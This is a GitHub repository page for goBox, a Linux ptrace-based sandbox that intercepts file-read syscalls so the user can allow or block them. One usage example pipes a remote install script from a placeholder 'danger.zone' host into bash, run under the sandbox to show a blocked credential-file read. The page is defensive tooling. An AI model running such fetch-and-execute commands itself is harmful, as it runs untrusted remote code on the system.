Skip to content

nishitm/goBox

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits

.gitignore

.gitignore

 
 

Makefile

Makefile

 
 

README.md

README.md

 
 

go.mod

go.mod

 
 

go.sum

go.sum

 
 

gobox.go

gobox.go

 
 

gobox_test.go

gobox_test.go

 
 

pass.txt

pass.txt

 
 

Repository files navigation

goBox

GO sandbox to run untrusted code.

goBox uses Ptrace to hook into READ syscalls, giving you the option to accept or deny syscalls before they are executed.

Usage

Usage of ./gobox:

  gobox [FLAGS] command

  flags:
    -h	Print Usage.
    -n value
        A glob pattern for automatically blocking file reads.
    -y value
        A glob pattern for automatically allowing file reads.

Use cases

You want to install anything

> gobox -n "/etc/password.txt" npm install sketchy-module

  BLOCKED READ on /etc/password.txt
> gobox -n "/etc/password.txt" bash <(curl  https://danger.zone/install.sh)

  BLOCKED READ on /etc/password.txt

You are interested in what file reads you favourite program makes.

Sure you could use strace, but it references file descriptors goBox makes the this much easier at a glance by printing the absolute path of the fd.

> gobox ls
Wanting to READ /usr/lib/x86_64-linux-gnu/libselinux.so.1 [y/n]

NOTE: It's definitely a better idea to encrypt all your sensitive data, goBox should probably only be used when that is inconvenient or impractical.

NOTE: I haven't made any effort for cross-x compatibility so it currently only works on linux. I'd happily accept patches to improve portability.

About

GO sandbox to run untrusted code

Topics

golang security sandbox security-tools systemcalls

Resources

Readme
Activity

Stars

40 stars

Watchers

6 watching

Forks

8 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages